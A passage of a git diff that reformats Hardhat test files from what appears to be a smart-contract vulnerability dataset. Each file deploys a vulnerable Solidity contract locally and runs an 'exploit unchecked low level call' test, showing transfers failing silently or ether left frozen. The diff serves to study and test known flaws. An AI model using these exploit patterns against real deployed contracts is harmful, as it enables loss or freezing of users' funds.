"EBU", "EBU"); - const SuccessContract = await ethers.getContractFactory("contracts/unchecked_low_level_calls/success_contract.sol:SuccessContract"); + const SuccessContract = await ethers.getContractFactory( + "contracts/unchecked_low_level_calls/success_contract.sol:SuccessContract", + ); const success_contract = await SuccessContract.deploy(); - return {contract, token, success_contract} - }; + return { contract, token, success_contract }; + } - it('sanity check: unchecked_low_level_calls/0xa1fceeff3acc57d257b917e30c4df661401d6431.sol', async function () { - const {contract, success_contract} = await loadFixture(deployContracts); + it("sanity check: unchecked_low_level_calls/0xa1fceeff3acc57d257b917e30c4df661401d6431.sol", async function () { + const { contract, success_contract } = await loadFixture(deployContracts); const amount = ethers.parseEther("1"); - await expect(contract.connect(owner).transfer(success_contract.target, [contract.target], [amount])).to.not.be.reverted; - expect(await success_contract.balanceOf(contract.target)).to.be.equal(amount); + await expect( + contract + .connect(owner) + .transfer(success_contract.target, [contract.target], [amount]), + ).to.not.be.reverted; + expect(await success_contract.balanceOf(contract.target)).to.be.equal( + amount, + ); }); it("exploit unchecked low level call vulnerability", async function () { - const {contract, token} = await loadFixture(deployContracts); + const { contract, token } = await loadFixture(deployContracts); const amount = await token.balanceOf(owner.address); expect(amount).to.be.equal(1000000000000000000n); @@ -53,6 +69,5 @@ describe("attack unchecked_low_level_calls/0xa1fceeff3acc57d257b917e30c4df661401 expect(await token.balanceOf(owner)).to.be.equal(amount - BigInt(10)); expect(await token.balanceOf(contract.target)).to.be.equal(10); expect(await token.balanceOf(sig.address)).to.be.equal(0); - }); }); diff --git a/smartbugs-curated/0.4.x/test/unchecked_low_level_calls/0xa46edd6a9a93feec36576ee5048146870ea2c3ae_test.js b/smartbugs-curated/0.4.x/test/unchecked_low_level_calls/0xa46edd6a9a93feec36576ee5048146870ea2c3ae_test.js index f45dad8..a314cfc 100644 --- a/smartbugs-curated/0.4.x/test/unchecked_low_level_calls/0xa46edd6a9a93feec36576ee5048146870ea2c3ae_test.js +++ b/smartbugs-curated/0.4.x/test/unchecked_low_level_calls/0xa46edd6a9a93feec36576ee5048146870ea2c3ae_test.js @@ -1,35 +1,53 @@ -const { loadFixture } = require('@nomicfoundation/hardhat-network-helpers'); -const { expect } = require('chai'); +const { loadFixture } = require("@nomicfoundation/hardhat-network-helpers"); +const { expect } = require("chai"); const path = require("path"); const fs = require("fs"); describe("attack unchecked_low_level_calls/0xa46edd6a9a93feec36576ee5048146870ea2c3ae.sol", function () { - let owner, sig; + let owner, sig; async function deployContracts() { [owner, sig] = await ethers.getSigners(); - const codePath = path.join(__dirname, '../../artifacts/contracts/dataset/unchecked_low_level_calls/0xa46edd6a9a93feec36576ee5048146870ea2c3ae.sol/EBU.json'); + const codePath = path.join( + __dirname, + "../../artifacts/contracts/dataset/unchecked_low_level_calls/0xa46edd6a9a93feec36576ee5048146870ea2c3ae.sol/EBU.json", + ); const json = JSON.parse(fs.readFileSync(codePath)); const EBU = await ethers.getContractFactory(json.abi, json.bytecode); const contract = await EBU.deploy(); - const TokenEBU = await ethers.getContractFactory("contracts/unchecked_low_level_calls/TokenEBU.sol:TokenEBU"); + const TokenEBU = await ethers.getContractFactory( + "contracts/unchecked_low_level_calls/TokenEBU.sol:TokenEBU", + ); const token = await TokenEBU.connect(owner).deploy(1, "EBU", "EBU"); - const SuccessContract = await ethers.getContractFactory("contracts/unchecked_low_level_calls/success_contract.sol:SuccessContract"); + const SuccessContract = await ethers.getContractFactory( + "contracts/unchecked_low_level_calls/success_contract.sol:SuccessContract", + ); const success_contract = await SuccessContract.deploy(); - return {contract, token, success_contract} - }; + return { contract, token, success_contract }; + } - it('sanity check: unchecked_low_level_calls/0xa46edd6a9a93feec36576ee5048146870ea2c3ae.sol', async function () { - const {contract, success_contract} = await loadFixture(deployContracts); + it("sanity check: unchecked_low_level_calls/0xa46edd6a9a93feec36576ee5048146870ea2c3ae.sol", async function () { + const { contract, success_contract } = await loadFixture(deployContracts); const amount = ethers.parseEther("1"); - await expect(contract.connect(owner).transfer(owner.address, success_contract.target, [contract.target], [amount])).to.not.be.reverted; - expect(await success_contract.balanceOf(contract.target)).to.be.equal(amount); + await expect( + contract + .connect(owner) + .transfer( + owner.address, + success_contract.target, + [contract.target], + [amount], + ), + ).to.not.be.reverted; + expect(await success_contract.balanceOf(contract.target)).to.be.equal( + amount, + ); }); it("exploit unchecked low level call vulnerability", async function () { - const {contract, token} = await loadFixture(deployContracts); + const { contract, token } = await loadFixture(deployContracts); const amount = await token.balanceOf(owner.address); expect(amount).to.be.equal(1000000000000000000n); @@ -48,11 +66,11 @@ describe("attack unchecked_low_level_calls/0xa46edd6a9a93feec36576ee5048146870ea const val = [10, 10]; // it does not revert cause the return value of call is not checked - await expect(contract.transfer(from, token.target, to, val)).not.be.reverted; + await expect(contract.transfer(from, token.target, to, val)).not.be + .reverted; // the second transfer does not happen expect(await token.balanceOf(owner)).to.be.equal(amount - BigInt(10)); expect(await token.balanceOf(contract.target)).to.be.equal(10); expect(await token.balanceOf(sig.address)).to.be.equal(0); - }); }); diff --git a/smartbugs-curated/0.4.x/test/unchecked_low_level_calls/0xb11b2fed6c9354f7aa2f658d3b4d7b31d8a13b77_test.js b/smartbugs-curated/0.4.x/test/unchecked_low_level_calls/0xb11b2fed6c9354f7aa2f658d3b4d7b31d8a13b77_test.js index 531220d..9416854 100644 --- a/smartbugs-curated/0.4.x/test/unchecked_low_level_calls/0xb11b2fed6c9354f7aa2f658d3b4d7b31d8a13b77_test.js +++ b/smartbugs-curated/0.4.x/test/unchecked_low_level_calls/0xb11b2fed6c9354f7aa2f658d3b4d7b31d8a13b77_test.js @@ -1,58 +1,84 @@ -const { loadFixture } = require('@nomicfoundation/hardhat-network-helpers'); -const { expect } = require('chai'); +const { loadFixture } = require("@nomicfoundation/hardhat-network-helpers"); +const { expect } = require("chai"); const path = require("path"); const fs = require("fs"); describe("attack unchecked_low_level_calls/0xb11b2fed6c9354f7aa2f658d3b4d7b31d8a13b77.sol", function () { - let owner; async function deployContracts() { [owner] = await ethers.getSigners(); - const codePath = path.join(__dirname, '../../artifacts/contracts/dataset/unchecked_low_level_calls/0xb11b2fed6c9354f7aa2f658d3b4d7b31d8a13b77.sol/DepositProxy.json'); + const codePath = path.join( + __dirname, + "../../artifacts/contracts/dataset/unchecked_low_level_calls/0xb11b2fed6c9354f7aa2f658d3b4d7b31d8a13b77.sol/DepositProxy.json", + ); const json = JSON.parse(fs.readFileSync(codePath)); - const DepositProxy = await ethers.getContractFactory(json.abi, json.bytecode); + const DepositProxy = await ethers.getContractFactory( + json.abi, + json.bytecode, + ); const contract = await DepositProxy.connect(owner).deploy(); - const RevertContract = await ethers.getContractFactory("contracts/unchecked_low_level_calls/revert_contract.sol:RevertContract"); + const RevertContract = await ethers.getContractFactory( + "contracts/unchecked_low_level_calls/revert_contract.sol:RevertContract", + ); const revertContract = await RevertContract.deploy(); - const SuccessContract = await ethers.getContractFactory("contracts/unchecked_low_level_calls/success_contract.sol:SuccessContract"); + const SuccessContract = await ethers.getContractFactory( + "contracts/unchecked_low_level_calls/success_contract.sol:SuccessContract", + ); const successContract = await SuccessContract.deploy(); - return {contract, revertContract, successContract} - }; + return { contract, revertContract, successContract }; + } - it('sanity check: unchecked_low_level_calls/0xb11b2fed6c9354f7aa2f658d3b4d7b31d8a13b77.sol', async function () { - const {contract, successContract} = await loadFixture(deployContracts); + it("sanity check: unchecked_low_level_calls/0xb11b2fed6c9354f7aa2f658d3b4d7b31d8a13b77.sol", async function () { + const { contract, successContract } = await loadFixture(deployContracts); const amount = ethers.parseEther("1"); - await expect(contract.connect(owner).proxy(successContract.target, "0x", {value: amount})).to.not.be.reverted; - expect(await ethers.provider.getBalance(successContract.target)).to.be.equal(amount); + await expect( + contract + .connect(owner) + .proxy(successContract.target, "0x", { value: amount }), + ).to.not.be.reverted; + expect( + await ethers.provider.getBalance(successContract.target), + ).to.be.equal(amount); }); it("exploit unchecked low level call vulnerability", async function () { - const {contract, revertContract} = await loadFixture(deployContracts); + const { contract, revertContract } = await loadFixture(deployContracts); const amount = ethers.parseEther("1"); await expect( owner.sendTransaction({ to: revertContract.target, value: amount, - }) + }), ).to.be.revertedWith("I always revert!"); - const DepositBalanceBefore = await ethers.provider.getBalance(contract.target); + const DepositBalanceBefore = await ethers.provider.getBalance( + contract.target, + ); expect(DepositBalanceBefore).to.be.equal(0); - const RevertBalanceBefore = await ethers.provider.getBalance(revertContract.target); + const RevertBalanceBefore = await ethers.provider.getBalance( + revertContract.target, + ); expect(RevertBalanceBefore).to.be.equal(0); - await expect(contract.connect(owner).proxy(revertContract.target, "0x", {value: amount})).to.not.be.reverted; + await expect( + contract + .connect(owner) + .proxy(revertContract.target, "0x", { value: amount }), + ).to.not.be.reverted; - expect(await ethers.provider.getBalance(revertContract.target)).to.be.equal(0); - - //funds are frozen in the contract - expect(await ethers.provider.getBalance(contract.target)).to.be.equal(amount); + expect(await ethers.provider.getBalance(revertContract.target)).to.be.equal( + 0, + ); + //funds are frozen in the contract + expect(await ethers.provider.getBalance(contract.target)).to.be.equal( + amount, + ); await contract.connect(owner).Vault(); @@ -62,9 +88,8 @@ describe("attack unchecked_low_level_calls/0xb11b2fed6c9354f7aa2f658d3b4d7b31d8a //withdraw won't return the funds since the deposit is zero const tx = await contract.connect(owner).withdraw(amount); const receipt = await tx.wait(); - expect(await ethers.provider.getBalance(owner.address)).to.be.equal(OwnerBalance - receipt.gasUsed * tx.gasPrice); - - - + expect(await ethers.provider.getBalance(owner.address)).to.be.equal( + OwnerBalance - receipt.gasUsed * tx.gasPrice, + ); }); }); diff --git a/smartbugs-curated/0.4.x/test/unchecked_low_level_calls/0xb7c5c5aa4d42967efe906e1b66cb8df9cebf04f7_test.js b/smartbugs-curated/0.4.x/test/unchecked_low_level_calls/0xb7c5c5aa4d42967efe906e1b66cb8df9cebf04f7_test.js index 6ed995b..c4685bd 100644 --- a/smartbugs-curated/0.4.x/test/unchecked_low_level_calls/0xb7c5c5aa4d42967efe906e1b66cb8df9cebf04f7_test.js +++ b/smartbugs-curated/0.4.x/test/unchecked_low_level_calls/0xb7c5c5aa4d42967efe906e1b66cb8df9cebf04f7_test.js @@ -1,66 +1,91 @@ -const { loadFixture } = require('@nomicfoundation/hardhat-network-helpers'); -const { expect } = require('chai'); +const { loadFixture } = require("@nomicfoundation/hardhat-network-helpers"); +const { expect } = require("chai"); const path = require("path"); const fs = require("fs"); describe("attack unchecked_low_level_calls/0xb7c5c5aa4d42967efe906e1b66cb8df9cebf04f7.sol", function () { - let owner; async function deployContracts() { [owner] = await ethers.getSigners(); - const codePath = path.join(__dirname, '../../artifacts/contracts/dataset/unchecked_low_level_calls/0xb7c5c5aa4d42967efe906e1b66cb8df9cebf04f7.sol/keepMyEther.json'); + const codePath = path.join( + __dirname, + "../../artifacts/contracts/dataset/unchecked_low_level_calls/0xb7c5c5aa4d42967efe906e1b66cb8df9cebf04f7.sol/keepMyEther.json", + ); const json = JSON.parse(fs.readFileSync(codePath)); - const keepMyEther = await ethers.getContractFactory(json.abi, json.bytecode); + const keepMyEther = await ethers.getContractFactory( + json.abi, + json.bytecode, + ); const contract = await keepMyEther.connect(owner).deploy(); - const RevertContract = await ethers.getContractFactory("contracts/unchecked_low_level_calls/revert_contract.sol:RevertContract"); + const RevertContract = await ethers.getContractFactory( + "contracts/unchecked_low_level_calls/revert_contract.sol:RevertContract", + ); const revertContract = await RevertContract.deploy(); - const SuccessContract = await ethers.getContractFactory("contracts/unchecked_low_level_calls/success_contract.sol:SuccessContract"); + const SuccessContract = await ethers.getContractFactory( + "contracts/unchecked_low_level_calls/success_contract.sol:SuccessContract", + ); const successContract = await SuccessContract.deploy(); - return {contract, revertContract, successContract} - }; + return { contract, revertContract, successContract }; + } - it('sanity check: unchecked_low_level_calls/0xb7c5c5aa4d42967efe906e1b66cb8df9cebf04f7.sol', async function () { - const {contract, successContract} = await loadFixture(deployContracts); + it("sanity check: unchecked_low_level_calls/0xb7c5c5aa4d42967efe906e1b66cb8df9cebf04f7.sol", async function () { + const { contract, successContract } = await loadFixture(deployContracts); const amount = ethers.parseEther("1"); - await expect(successContract.sendEther(contract.target, {value: amount})).not.be.reverted; + await expect(successContract.sendEther(contract.target, { value: amount })) + .not.be.reverted; expect(await contract.balances(successContract.target)).to.be.equal(amount); - expect(await ethers.provider.getBalance(successContract.target)).to.be.equal(0); - expect(await ethers.provider.getBalance(contract.target)).to.be.equal(amount); - - await expect(successContract.withdrawEther(contract.target)).to.not.be.reverted; + expect( + await ethers.provider.getBalance(successContract.target), + ).to.be.equal(0); + expect(await ethers.provider.getBalance(contract.target)).to.be.equal( + amount, + ); + + await expect(successContract.withdrawEther(contract.target)).to.not.be + .reverted; expect(await contract.balances(successContract.target)).to.be.equal(0); - expect(await ethers.provider.getBalance(successContract.target)).to.be.equal(amount); + expect( + await ethers.provider.getBalance(successContract.target), + ).to.be.equal(amount); expect(await ethers.provider.getBalance(contract.target)).to.be.equal(0); }); it("exploit unchecked low level call vulnerability", async function () { - const {contract, revertContract} = await loadFixture(deployContracts); + const { contract, revertContract } = await loadFixture(deployContracts); expect(await ethers.provider.getBalance(contract.target)).to.be.equal(0); - expect(await ethers.provider.getBalance(revertContract.target)).to.be.equal(0); + expect(await ethers.provider.getBalance(revertContract.target)).to.be.equal( + 0, + ); const amount = ethers.parseEther("1"); await expect( owner.sendTransaction({ to: revertContract.target, value: amount, - }) + }), ).to.be.revertedWith("I always revert!"); - await revertContract.sendEther(contract.target, {value: amount}); + await revertContract.sendEther(contract.target, { value: amount }); - expect(await ethers.provider.getBalance(contract.target)).to.be.equal(amount); + expect(await ethers.provider.getBalance(contract.target)).to.be.equal( + amount, + ); expect(await contract.balances(revertContract.target)).to.be.equal(amount); - await expect(revertContract.withdrawEther(contract.target)).to.not.be.reverted; + await expect(revertContract.withdrawEther(contract.target)).to.not.be + .reverted; - expect(await ethers.provider.getBalance(contract.target)).to.be.equal(amount); + expect(await ethers.provider.getBalance(contract.target)).to.be.equal( + amount, + ); - expect(await ethers.provider.getBalance(revertContract.target)).to.be.equal(0); + expect(await ethers.provider.getBalance(revertContract.target)).to.be.equal( + 0, + ); expect(await contract.balances(revertContract.target)).to.be.equal(0); - }); }); diff --git a/smartbugs-curated/0.4.x/test/unchecked_low_level_calls/0xbaa3de6504690efb064420d89e871c27065cdd52_test.js b/smartbugs-curated/0.4.x/test/unchecked_low_level_calls/0xbaa3de6504690efb064420d89e871c27065cdd52_test.js index 6bbbd71..990b950 100644 --- a/smartbugs-curated/0.4.x/test/unchecked_low_level_calls/0xbaa3de6504690efb064420d89e871c27065cdd52_test.js +++ b/smartbugs-curated/0.4.x/test/unchecked_low_level_calls/0xbaa3de6504690efb064420d89e871c27065cdd52_test.js @@ -1,58 +1,81 @@ -const { loadFixture } = require('@nomicfoundation/hardhat-network-helpers'); -const { expect } = require('chai'); +const { loadFixture } = require("@nomicfoundation/hardhat-network-helpers"); +const { expect } = require("chai"); const path = require("path"); const fs = require("fs"); describe("attack unchecked_low_level_calls/0xbaa3de6504690efb064420d89e871c27065cdd52.sol", function () { - let owner; async function deployContracts() { [owner] = await ethers.getSigners(); - const codePath = path.join(__dirname, '../../artifacts/contracts/dataset/unchecked_low_level_calls/0xbaa3de6504690efb064420d89e871c27065cdd52.sol/VaultProxy.json'); + const codePath = path.join( + __dirname, + "../../artifacts/contracts/dataset/unchecked_low_level_calls/0xbaa3de6504690efb064420d89e871c27065cdd52.sol/VaultProxy.json", + ); const json = JSON.parse(fs.readFileSync(codePath)); const VaultProxy = await ethers.getContractFactory(json.abi, json.bytecode); const contract = await VaultProxy.connect(owner).deploy(); - const RevertContract = await ethers.getContractFactory("contracts/unchecked_low_level_calls/revert_contract.sol:RevertContract"); + const RevertContract = await ethers.getContractFactory( + "contracts/unchecked_low_level_calls/revert_contract.sol:RevertContract", + ); const revertContract = await RevertContract.deploy(); - const SuccessContract = await ethers.getContractFactory("contracts/unchecked_low_level_calls/success_contract.sol:SuccessContract"); + const SuccessContract = await ethers.getContractFactory( + "contracts/unchecked_low_level_calls/success_contract.sol:SuccessContract", + ); const successContract = await SuccessContract.deploy(); - return {contract, revertContract, successContract} - }; + return { contract, revertContract, successContract }; + } - it('sanity check: unchecked_low_level_calls/0xbaa3de6504690efb064420d89e871c27065cdd52.sol', async function () { - const {contract, successContract} = await loadFixture(deployContracts); + it("sanity check: unchecked_low_level_calls/0xbaa3de6504690efb064420d89e871c27065cdd52.sol", async function () { + const { contract, successContract } = await loadFixture(deployContracts); const amount = ethers.parseEther("1"); - await expect(contract.connect(owner).proxy(successContract.target, "0x", {value: amount})).to.not.be.reverted; - expect(await ethers.provider.getBalance(successContract.target)).to.be.equal(amount); + await expect( + contract + .connect(owner) + .proxy(successContract.target, "0x", { value: amount }), + ).to.not.be.reverted; + expect( + await ethers.provider.getBalance(successContract.target), + ).to.be.equal(amount); }); it("exploit unchecked low level call vulnerability", async function () { - const {contract, revertContract} = await loadFixture(deployContracts); + const { contract, revertContract } = await loadFixture(deployContracts); const amount = ethers.parseEther("1"); await expect( owner.sendTransaction({ to: revertContract.target, value: amount, - }) + }), ).to.be.revertedWith("I always revert!"); - const DepositBalanceBefore = await ethers.provider.getBalance(contract.target); + const DepositBalanceBefore = await ethers.provider.getBalance( + contract.target, + ); expect(DepositBalanceBefore).to.be.equal(0); - const RevertBalanceBefore = await ethers.provider.getBalance(revertContract.target); + const RevertBalanceBefore = await ethers.provider.getBalance( + revertContract.target, + ); expect(RevertBalanceBefore).to.be.equal(0); - await expect(contract.connect(owner).proxy(revertContract.target, "0x", {value: amount})).to.not.be.reverted; + await expect( + contract + .connect(owner) + .proxy(revertContract.target, "0x", { value: amount }), + ).to.not.be.reverted; + + expect(await ethers.provider.getBalance(revertContract.target)).to.be.equal( + 0, + ); - expect(await ethers.provider.getBalance(revertContract.target)).to.be.equal(0); - //funds are frozen in the contract - expect(await ethers.provider.getBalance(contract.target)).to.be.equal(amount); - + expect(await ethers.provider.getBalance(contract.target)).to.be.equal( + amount, + ); await contract.connect(owner).Vault(); @@ -62,7 +85,8 @@ describe("attack unchecked_low_level_calls/0xbaa3de6504690efb064420d89e871c27065 //withdraw won't return the funds since the deposit is zero const tx = await contract.connect(owner).withdraw(amount); const receipt = await tx.wait(); - expect(await ethers.provider.getBalance(owner.address)).to.be.equal(OwnerBalance - receipt.gasUsed * tx.gasPrice); - + expect(await ethers.provider.getBalance(owner.address)).to.be.equal( + OwnerBalance - receipt.gasUsed * tx.gasPrice, + ); }); }); diff --git a/smartbugs-curated/0.4.x/test/unchecked_low_level_calls/0xbebbfe5b549f5db6e6c78ca97cac19d1fb03082c_test.js b/smartbugs-curated/0.4.x/test/unchecked_low_level_calls/0xbebbfe5b549f5db6e6c78ca97cac19d1fb03082c_test.js index a0eb142..6b9657d 100644 --- a/smartbugs-curated/0.4.x/test/unchecked_low_level_calls/0xbebbfe5b549f5db6e6c78ca97cac19d1fb03082c_test.js +++ b/smartbugs-curated/0.4.x/test/unchecked_low_level_calls/0xbebbfe5b549f5db6e6c78ca97cac19d1fb03082c_test.js @@ -1,58 +1,81 @@ -const { loadFixture } = require('@nomicfoundation/hardhat-network-helpers'); -const { expect } = require('chai'); +const { loadFixture } = require("@nomicfoundation/hardhat-network-helpers"); +const { expect } = require("chai"); const path = require("path"); const fs = require("fs"); describe("attack unchecked_low_level_calls/0xbebbfe5b549f5db6e6c78ca97cac19d1fb03082c.sol", function () { - let owner; async function deployContracts() { [owner] = await ethers.getSigners(); - const codePath = path.join(__dirname, '../../artifacts/contracts/dataset/unchecked_low_level_calls/0xbebbfe5b549f5db6e6c78ca97cac19d1fb03082c.sol/VaultProxy.json'); + const codePath = path.join( + __dirname, + "../../artifacts/contracts/dataset/unchecked_low_level_calls/0xbebbfe5b549f5db6e6c78ca97cac19d1fb03082c.sol/VaultProxy.json", + ); const json = JSON.parse(fs.readFileSync(codePath)); const VaultProxy = await ethers.getContractFactory(json.abi, json.bytecode); const contract = await VaultProxy.connect(owner).deploy(); - const RevertContract = await ethers.getContractFactory("contracts/unchecked_low_level_calls/revert_contract.sol:RevertContract"); + const RevertContract = await ethers.getContractFactory( + "contracts/unchecked_low_level_calls/revert_contract.sol:RevertContract", + ); const revertContract = await RevertContract.deploy(); - const SuccessContract = await ethers.getContractFactory("contracts/unchecked_low_level_calls/success_contract.sol:SuccessContract"); + const SuccessContract = await ethers.getContractFactory( + "contracts/unchecked_low_level_calls/success_contract.sol:SuccessContract", + ); const successContract = await SuccessContract.deploy(); - return {contract, revertContract, successContract} - }; + return { contract, revertContract, successContract }; + } - it('sanity check: unchecked_low_level_calls/0xbebbfe5b549f5db6e6c78ca97cac19d1fb03082c.sol', async function () { - const {contract, successContract} = await loadFixture(deployContracts); + it("sanity check: unchecked_low_level_calls/0xbebbfe5b549f5db6e6c78ca97cac19d1fb03082c.sol", async function () { + const { contract, successContract } = await loadFixture(deployContracts); const amount = ethers.parseEther("1"); - await expect(contract.connect(owner).proxy(successContract.target, "0x", {value: amount})).to.not.be.reverted; - expect(await ethers.provider.getBalance(successContract.target)).to.be.equal(amount); + await expect( + contract + .connect(owner) + .proxy(successContract.target, "0x", { value: amount }), + ).to.not.be.reverted; + expect( + await ethers.provider.getBalance(successContract.target), + ).to.be.equal(amount); }); it("exploit unchecked low level call vulnerability", async function () { - const {contract, revertContract} = await loadFixture(deployContracts); + const { contract, revertContract } = await loadFixture(deployContracts); const amount = ethers.parseEther("1"); await expect( owner.sendTransaction({ to: revertContract.target, value: amount, - }) + }), ).to.be.revertedWith("I always revert!"); - const DepositBalanceBefore = await ethers.provider.getBalance(contract.target); + const DepositBalanceBefore = await ethers.provider.getBalance( + contract.target, + ); expect(DepositBalanceBefore).to.be.equal(0); - const RevertBalanceBefore = await ethers.provider.getBalance(revertContract.target); + const RevertBalanceBefore = await ethers.provider.getBalance( + revertContract.target, + ); expect(RevertBalanceBefore).to.be.equal(0); - await expect(contract.connect(owner).proxy(revertContract.target, "0x", {value: amount})).to.not.be.reverted; + await expect( + contract + .connect(owner) + .proxy(revertContract.target, "0x", { value: amount }), + ).to.not.be.reverted; - expect(await ethers.provider.getBalance(revertContract.target)).to.be.equal(0); - - //funds are frozen in the contract - expect(await ethers.provider.getBalance(contract.target)).to.be.equal(amount); + expect(await ethers.provider.getBalance(revertContract.target)).to.be.equal( + 0, + ); + //funds are frozen in the contract + expect(await ethers.provider.getBalance(contract.target)).to.be.equal( + amount, + ); await contract.connect(owner).Vault(); @@ -62,9 +85,8 @@ describe("attack unchecked_low_level_calls/0xbebbfe5b549f5db6e6c78ca97cac19d1fb0 //withdraw won't return the funds since the deposit is zero const tx = await contract.connect(owner).withdraw(amount); const receipt = await tx.wait(); - expect(await ethers.provider.getBalance(owner.address)).to.be.equal(OwnerBalance - receipt.gasUsed * tx.gasPrice); - - - + expect(await ethers.provider.getBalance(owner.address)).to.be.equal( + OwnerBalance - receipt.gasUsed * tx.gasPrice, + ); }); }); diff --git a/smartbugs-curated/0.4.x/test/unchecked_low_level_calls/0xd5967fed03e85d1cce44cab284695b41bc675b5c_test.js b/smartbugs-curated/0.4.x/test/unchecked_low_level_calls/0xd5967fed03e85d1cce44cab284695b41bc675b5c_test.js index 6297cd2..5ac4d14 100644 --- a/smartbugs-curated/0.4.x/test/unchecked_low_level_calls/0xd5967fed03e85d1cce44cab284695b41bc675b5c_test.js +++ b/smartbugs-curated/0.4.x/test/unchecked_low_level_calls/0xd5967fed03e85d1cce44cab284695b41bc675b5c_test.js @@ -1,35 +1,53 @@ -const { loadFixture } = require('@nomicfoundation/hardhat-network-helpers'); -const { expect } = require('chai'); +const { loadFixture } = require("@nomicfoundation/hardhat-network-helpers"); +const { expect } = require("chai"); const path = require("path"); const fs = require("fs"); describe("attack unchecked_low_level_calls/0xd5967fed03e85d1cce44cab284695b41bc675b5c.sol", function () { - let owner, sig; + let owner, sig; async function deployContracts() { [owner, sig] = await ethers.getSigners(); - const codePath = path.join(__dirname, '../../artifacts/contracts/dataset/unchecked_low_level_calls/0xd5967fed03e85d1cce44cab284695b41bc675b5c.sol/demo.json'); + const codePath = path.join( + __dirname, + "../../artifacts/contracts/dataset/unchecked_low_level_calls/0xd5967fed03e85d1cce44cab284695b41bc675b5c.sol/demo.json", + ); const json = JSON.parse(fs.readFileSync(codePath)); const demo = await ethers.getContractFactory(json.abi, json.bytecode); const contract = await demo.deploy(); - const TokenEBU = await ethers.getContractFactory("contracts/unchecked_low_level_calls/TokenEBU.sol:TokenEBU"); + const TokenEBU = await ethers.getContractFactory( + "contracts/unchecked_low_level_calls/TokenEBU.sol:TokenEBU", + ); const token = await TokenEBU.connect(owner).deploy(1, "EBU", "EBU"); - const SuccessContract = await ethers.getContractFactory("contracts/unchecked_low_level_calls/success_contract.sol:SuccessContract"); + const SuccessContract = await ethers.getContractFactory( + "contracts/unchecked_low_level_calls/success_contract.sol:SuccessContract", + ); const success_contract = await SuccessContract.deploy(); - return {contract, token, success_contract} - }; + return { contract, token, success_contract }; + } - it('sanity check: unchecked_low_level_calls/0xd5967fed03e85d1cce44cab284695b41bc675b5c.sol', async function () { - const {contract, success_contract} = await loadFixture(deployContracts); + it("sanity check: unchecked_low_level_calls/0xd5967fed03e85d1cce44cab284695b41bc675b5c.sol", async function () { + const { contract, success_contract } = await loadFixture(deployContracts); const amount = ethers.parseEther("1"); - await expect(contract.connect(owner).transfer(owner.address, success_contract.target, [contract.target], amount)).to.not.be.reverted; - expect(await success_contract.balanceOf(contract.target)).to.be.equal(amount); + await expect( + contract + .connect(owner) + .transfer( + owner.address, + success_contract.target, + [contract.target], + amount, + ), + ).to.not.be.reverted; + expect(await success_contract.balanceOf(contract.target)).to.be.equal( + amount, + ); }); it("exploit unchecked low level call vulnerability", async function () { - const {contract, token} = await loadFixture(deployContracts); + const { contract, token } = await loadFixture(deployContracts); const amount = await token.balanceOf(owner.address); expect(amount).to.be.equal(1000000000000000000n); @@ -48,11 +66,11 @@ describe("attack unchecked_low_level_calls/0xd5967fed03e85d1cce44cab284695b41bc6 const val = 10; // it does not revert cause the return value of call is not checked - await expect(contract.transfer(from, token.target, to, val)).not.be.reverted; + await expect(contract.transfer(from, token.target, to, val)).not.be + .reverted; // the second transfer does not happen expect(await token.balanceOf(owner)).to.be.equal(amount - BigInt(val)); expect(await token.balanceOf(contract.target)).to.be.equal(10); expect(await token.balanceOf(sig.address)).to.be.equal(0); - }); }); diff --git a/smartbugs-curated/0.4.x/test/unchecked_low_level_calls/0xe894d54dca59cb53fe9cbc5155093605c7068220_test.js b/smartbugs-curated/0.4.x/test/unchecked_low_level_calls/0xe894d54dca59cb53fe9cbc5155093605c7068220_test.js index 8ea6770..2422ae4 100644 --- a/smartbugs-curated/0.4.x/test/unchecked_low_level_calls/0xe894d54dca59cb53fe9cbc5155093605c7068220_test.js +++ b/smartbugs-curated/0.4.x/test/unchecked_low_level_calls/0xe894d54dca59cb53fe9cbc5155093605c7068220_test.js @@ -1,35 +1,54 @@ -const { loadFixture } = require('@nomicfoundation/hardhat-network-helpers'); -const { expect } = require('chai'); +const { loadFixture } = require("@nomicfoundation/hardhat-network-helpers"); +const { expect } = require("chai"); const path = require("path"); const fs = require("fs"); describe("attack unchecked_low_level_calls/0xe894d54dca59cb53fe9cbc5155093605c7068220.sol", function () { - let owner, sig; + let owner, sig; async function deployContracts() { [owner, sig] = await ethers.getSigners(); - const codePath = path.join(__dirname, '../../artifacts/contracts/dataset/unchecked_low_level_calls/0xe894d54dca59cb53fe9cbc5155093605c7068220.sol/airDrop.json'); + const codePath = path.join( + __dirname, + "../../artifacts/contracts/dataset/unchecked_low_level_calls/0xe894d54dca59cb53fe9cbc5155093605c7068220.sol/airDrop.json", + ); const json = JSON.parse(fs.readFileSync(codePath)); const airDrop = await ethers.getContractFactory(json.abi, json.bytecode); const contract = await airDrop.deploy(); - const TokenEBU = await ethers.getContractFactory("contracts/unchecked_low_level_calls/TokenEBU.sol:TokenEBU"); + const TokenEBU = await ethers.getContractFactory( + "contracts/unchecked_low_level_calls/TokenEBU.sol:TokenEBU", + ); const token = await TokenEBU.connect(owner).deploy(1, "EBU", "EBU"); - const SuccessContract = await ethers.getContractFactory("contracts/unchecked_low_level_calls/success_contract.sol:SuccessContract"); + const SuccessContract = await ethers.getContractFactory( + "contracts/unchecked_low_level_calls/success_contract.sol:SuccessContract", + ); const success_contract = await SuccessContract.deploy(); - return {contract, token, success_contract} - }; + return { contract, token, success_contract }; + } - it('sanity check: unchecked_low_level_calls/0xe894d54dca59cb53fe9cbc5155093605c7068220.sol', async function () { - const {contract, success_contract} = await loadFixture(deployContracts); + it("sanity check: unchecked_low_level_calls/0xe894d54dca59cb53fe9cbc5155093605c7068220.sol", async function () { + const { contract, success_contract } = await loadFixture(deployContracts); const amount = ethers.parseEther("1"); - await expect(contract.connect(owner).transfer(owner.address, success_contract.target, [contract.target], amount, 0)).to.not.be.reverted; - expect(await success_contract.balanceOf(contract.target)).to.be.equal(amount); + await expect( + contract + .connect(owner) + .transfer( + owner.address, + success_contract.target, + [contract.target], + amount, + 0, + ), + ).to.not.be.reverted; + expect(await success_contract.balanceOf(contract.target)).to.be.equal( + amount, + ); }); it("exploit unchecked low level call vulnerability", async function () { - const {contract, token} = await loadFixture(deployContracts); + const { contract, token } = await loadFixture(deployContracts); const amount = await token.balanceOf(owner.address); expect(amount).to.be.equal(1000000000000000000n); @@ -49,11 +68,11 @@ describe("attack unchecked_low_level_calls/0xe894d54dca59cb53fe9cbc5155093605c70 const dec = 0; // it does not revert cause the return value of call is not checked - await expect(contract.transfer(from, token.target, to, val, dec)).not.be.reverted; + await expect(contract.transfer(from, token.target, to, val, 